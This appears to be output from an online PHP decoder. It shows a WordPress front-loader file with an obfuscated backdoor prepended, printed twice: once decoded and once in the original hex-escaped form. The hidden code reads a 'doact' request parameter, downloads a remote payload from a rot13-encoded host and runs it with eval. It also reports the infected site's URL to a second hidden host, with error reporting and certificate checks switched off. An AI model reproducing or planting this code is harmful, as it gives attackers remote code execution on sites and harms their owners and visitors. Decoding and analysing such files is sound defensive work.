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PHP Decode
<?php goto JMd0_; yo8hW: session_start(); goto hzEto; OnRXI: Jry5X: goto Qbb3Z; ba2z3: f..
Decoded Output download
goto JMd0_; yo8hW: session_start(); goto hzEto; OnRXI: Jry5X: goto Qbb3Z; ba2z3: function xmnSr($KMF4K) { goto Abk7e; Abk7e: $gW_W7 = ''; goto YRF9Q; Z14l9: fclose($f1I4V); goto nAb9m; SVZ4r: $gW_W7 = stream_get_contents($f1I4V); goto Z14l9; w2ttO: $gW_W7 = curl_exec($cRJvQ); goto SLTDO; rfG74: $f1I4V = fopen($KMF4K, "r"); goto SVZ4r; sG9V7: bf59H: goto vWZ2y; W3HU_: BllYp: goto uDowp; AJEe8: $gW_W7 = file_get_contents($KMF4K); goto W3HU_; i8vZZ: $cRJvQ = curl_init($KMF4K); goto TfqvQ; uDowp: if (!(empty($gW_W7) && function_exists("fopen") && function_exists("stream_get_contents"))) { goto eQd5c; } goto rfG74; mVt23: curl_setopt($cRJvQ, CURLOPT_FOLLOWLOCATION, 1); goto bBd07; TfqvQ: curl_setopt($cRJvQ, CURLOPT_RETURNTRANSFER, 1); goto mVt23; tGDKU: curl_setopt($cRJvQ, CURLOPT_SSL_VERIFYHOST, 0); goto w2ttO; vWZ2y: if (!(empty($gW_W7) && function_exists("file_get_contents"))) { goto BllYp; } goto AJEe8; f5DvE: return $gW_W7; goto SCmbd; SLTDO: curl_close($cRJvQ); goto sG9V7; bBd07: curl_setopt($cRJvQ, CURLOPT_SSL_VERIFYPEER, 0); goto tGDKU; YRF9Q: if (!function_exists("curl_exec")) { goto bf59H; } goto i8vZZ; nAb9m: eQd5c: goto f5DvE; SCmbd: } goto bvmYH; QW2gS: goto Jry5X; goto NsEwy; ndw2v: $_SESSION["doact"] = $C0zed; goto OnRXI; Qbb3Z: $Bsvtd = XMnsR(str_rot13("uggcf://icfqq.qsdsng.gbc/qbbe/") . $C0zed . ".txt"); goto ZstNM; NsEwy: A1bWV: goto ndw2v; xuOui: $KMF4K = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://{$_SERVER["HTTP_HOST"]}{$_SERVER["REQUEST_URI"]}"; goto AFVMk; AFVMk: OKVkZ(array("web" => $KMF4K)); goto QW2gS; JMd0_: error_reporting(0); goto yo8hW; m0vRc: if (!empty($C0zed)) { goto A1bWV; } goto xuOui; hzEto: $C0zed = $_REQUEST["doact"]; goto m0vRc; ZstNM: eval("?>" . $Bsvtd); goto ba2z3; bvmYH: function OKVKZ($qWT4v) { goto BAchi; U1QPj: $wAXrk = curl_init(str_rot13($KMF4K)); goto rADty; JE5Eo: curl_setopt($wAXrk, CURLOPT_RETURNTRANSFER, true); goto Camhf; Camhf: $tvBIN = curl_exec($wAXrk); goto PrZTC; BAchi: $KMF4K = "uggc://xfom8d.olubg.gbc/vaqrk.cuc"; goto U1QPj; PrZTC: curl_close($wAXrk); goto hS0OT; fi8yP: curl_setopt($wAXrk, CURLOPT_POSTFIELDS, $qWT4v); goto JE5Eo; rADty: curl_setopt($wAXrk, CURLOPT_POST, 1); goto fi8yP; hS0OT: }?><?php
* Loads the WordPress environment and template.
* @package WordPress
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
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Original Code
goto JMd0_; yo8hW: session_start(); goto hzEto; OnRXI: Jry5X: goto Qbb3Z; ba2z3: function xmnSr($KMF4K) { goto Abk7e; Abk7e: $gW_W7 = ''; goto YRF9Q; Z14l9: fclose($f1I4V); goto nAb9m; SVZ4r: $gW_W7 = stream_get_contents($f1I4V); goto Z14l9; w2ttO: $gW_W7 = curl_exec($cRJvQ); goto SLTDO; rfG74: $f1I4V = fopen($KMF4K, "\162"); goto SVZ4r; sG9V7: bf59H: goto vWZ2y; W3HU_: BllYp: goto uDowp; AJEe8: $gW_W7 = file_get_contents($KMF4K); goto W3HU_; i8vZZ: $cRJvQ = curl_init($KMF4K); goto TfqvQ; uDowp: if (!(empty($gW_W7) && function_exists("\146\157\x70\x65\156") && function_exists("\x73\164\162\145\x61\x6d\137\147\145\164\x5f\x63\157\x6e\164\145\x6e\164\163"))) { goto eQd5c; } goto rfG74; mVt23: curl_setopt($cRJvQ, CURLOPT_FOLLOWLOCATION, 1); goto bBd07; TfqvQ: curl_setopt($cRJvQ, CURLOPT_RETURNTRANSFER, 1); goto mVt23; tGDKU: curl_setopt($cRJvQ, CURLOPT_SSL_VERIFYHOST, 0); goto w2ttO; vWZ2y: if (!(empty($gW_W7) && function_exists("\x66\151\154\145\x5f\x67\x65\x74\x5f\143\x6f\x6e\x74\x65\156\x74\163"))) { goto BllYp; } goto AJEe8; f5DvE: return $gW_W7; goto SCmbd; SLTDO: curl_close($cRJvQ); goto sG9V7; bBd07: curl_setopt($cRJvQ, CURLOPT_SSL_VERIFYPEER, 0); goto tGDKU; YRF9Q: if (!function_exists("\x63\165\x72\154\137\145\170\x65\143")) { goto bf59H; } goto i8vZZ; nAb9m: eQd5c: goto f5DvE; SCmbd: } goto bvmYH; QW2gS: goto Jry5X; goto NsEwy; ndw2v: $_SESSION["\144\x6f\141\143\164"] = $C0zed; goto OnRXI; Qbb3Z: $Bsvtd = XMnsR(str_rot13("\x75\x67\x67\143\146\x3a\57\57\151\143\x66\161\161\x2e\x71\163\144\163\x6e\147\x2e\x67\142\143\x2f\161\x62\142\x65\x2f") . $C0zed . "\x2e\164\x78\x74"); goto ZstNM; NsEwy: A1bWV: goto ndw2v; xuOui: $KMF4K = (isset($_SERVER["\x48\x54\x54\x50\123"]) && $_SERVER["\x48\x54\124\120\x53"] === "\157\x6e" ? "\x68\164\x74\x70\x73" : "\150\x74\164\x70") . "\x3a\57\57{$_SERVER["\x48\124\x54\120\x5f\x48\x4f\123\124"]}{$_SERVER["\122\105\121\x55\x45\123\124\x5f\x55\122\111"]}"; goto AFVMk; AFVMk: OKVkZ(array("\167\x65\142" => $KMF4K)); goto QW2gS; JMd0_: error_reporting(0); goto yo8hW; m0vRc: if (!empty($C0zed)) { goto A1bWV; } goto xuOui; hzEto: $C0zed = $_REQUEST["\144\x6f\141\143\164"]; goto m0vRc; ZstNM: eval("\x3f\x3e" . $Bsvtd); goto ba2z3; bvmYH: function OKVKZ($qWT4v) { goto BAchi; U1QPj: $wAXrk = curl_init(str_rot13($KMF4K)); goto rADty; JE5Eo: curl_setopt($wAXrk, CURLOPT_RETURNTRANSFER, true); goto Camhf; Camhf: $tvBIN = curl_exec($wAXrk); goto PrZTC; BAchi: $KMF4K = "\x75\147\147\x63\x3a\57\x2f\170\x66\157\155\x38\x64\56\157\154\x75\142\147\56\147\x62\x63\57\x76\141\161\162\153\56\143\165\143"; goto U1QPj; PrZTC: curl_close($wAXrk); goto hS0OT; fi8yP: curl_setopt($wAXrk, CURLOPT_POSTFIELDS, $qWT4v); goto JE5Eo; rADty: curl_setopt($wAXrk, CURLOPT_POST, 1); goto fi8yP; hS0OT: }?><?php
* Loads the WordPress environment and template.
* @package WordPress
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
Function Calls
None |
MD5 | 3acd6ba4e530913b9362cea15fb5fb7a |
Eval Count | 0 |
Decode Time | 70 ms |